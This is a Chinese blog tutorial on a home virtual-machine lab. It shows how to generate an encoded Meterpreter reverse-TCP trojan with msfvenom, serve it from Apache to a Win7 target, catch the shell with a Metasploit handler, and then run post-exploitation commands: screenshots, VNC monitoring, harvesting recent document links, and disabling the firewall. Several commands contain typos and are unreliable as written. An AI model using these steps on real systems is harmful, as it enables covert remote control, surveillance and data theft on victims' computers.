利用msfvenom生成木马文件反弹shell

目录

1.安装靶机和攻击机

2.利用生成木马文件

 3.msf里面开启监听

4.攻击成功且利用

 5.meterpreter简单系统命令


1.安装靶机和攻击机


首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。

kali的下载地址Get Kali | Kali Linux:  在虚拟机里面直接选择打开就可以了。

利用msfvenom生成木马文件反弹shell_第1张图片

攻击机 kali ip是192.168.3.138

靶机win7 ip是192.168.3.150


2.利用生成木马文件

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LOHSTS=192.168.3.138 LPROT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜1.exe 

-a 指定构架如x86 x64。 x86代表32位, x64代表64位。 32位软件可以在64 位系统上运行。所以我们生成32位的后门。这样在32位和64位系统中都可以使用。

--platform 指定平台,这里选择windows 通过 --l platform可以查看所有支持平台。

-p 设置攻击载荷,我们使用windows/meterpreter/reverse_tcp,可以通过-l payloads 查看所有攻击载荷

LOHSTS监听的ip地址

LPROT 监听端口

-e 指定编码器,也就是所谓的免杀, x64/shikata_ga_nai是msf自带的编码器 -l encode 查看有多少编码器

-i 制作的软件字节,可随意

-f 输出文件格式

-b 避免使用的字符

-o 文件输出位置以及名字

利用msfvenom生成木马文件反弹shell_第2张图片如果你想靶机能够下载文件,需要在kali开启apache 命令:systemctl start apache2 

利用msfvenom生成木马文件反弹shell_第3张图片

在win7里面输入地址192.168.3.138/西瓜1.exe,先保存,我保存在桌面方便后期操作。

利用msfvenom生成木马文件反弹shell_第4张图片

 3.msf里面开启监听

第一步:开启msf:msfdb run 

第二步:使用 use exploit/multi/handler

第三步:查看参数 show options 可以通过show payload 查看需要设置那个payload 。

第四步:设置payload 可以看到默认的payload不是我想要的,所以我要重新设置一下,这个payload和你上面产生木马文件的payload要一样的。set payload windows/meterpreter/reverse_tcp

第五步:设置监听的IP地址 set LHOST 192.168.3.138

利用msfvenom生成木马文件反弹shell_第5张图片

 第六步: 开启监听 run

利用msfvenom生成木马文件反弹shell_第6张图片

4.攻击成功且利用

这时候当对方运行软件的时候,这边就会监听到,运行一下就可以了

可以看到建立会话,查看用户是普通用户,因为我登录时候就是普通用户登录的。下一篇是我基于win7的提权文章,如果想拿到更高权限,感兴趣可以看看。

基于msf内网渗透的win7提权几种方法_dreamthe的博客-CSDN博客

利用msfvenom生成木马文件反弹shell_第7张图片

 5.meterpreter简单系统命令

1.ps命令可以用来获取目标主机上正在运行的进程信息

利用msfvenom生成木马文件反弹shell_第8张图片

 2.sysinfo 查看系统信息

利用msfvenom生成木马文件反弹shell_第9张图片

3.screenshot对于目标机进行截图

利用msfvenom生成木马文件反弹shell_第10张图片

4.5. run vnc 可以远程实时监控目标机的画面。利用msfvenom生成木马文件反弹shell_第11张图片

  5.run post/windows/gather/checkvm 查看目标机是不是虚拟机。 

利用msfvenom生成木马文件反弹shell_第12张图片

6.7.run  post/windows/gather/dumplinks  获取目标主机上最近访问过的文档、链接信息利用msfvenom生成木马文件反弹shell_第13张图片

 7.netsh adcfirewall set allprofiles state off 关闭防火墙

8.backgroup 将会话保存到后台  

9.sessions 查看当前会话

10.sessions -i 11 进入会话,11是会话的ID就是编号。

11.sessions -k 11 会话结束。

利用msfvenom生成木马文件反弹shell_第14张图片

 12.unset LHOSt 撤销设置。

利用msfvenom生成木马文件反弹shell_第15张图片

你可能感兴趣的:(安全漏洞,web安全,安全)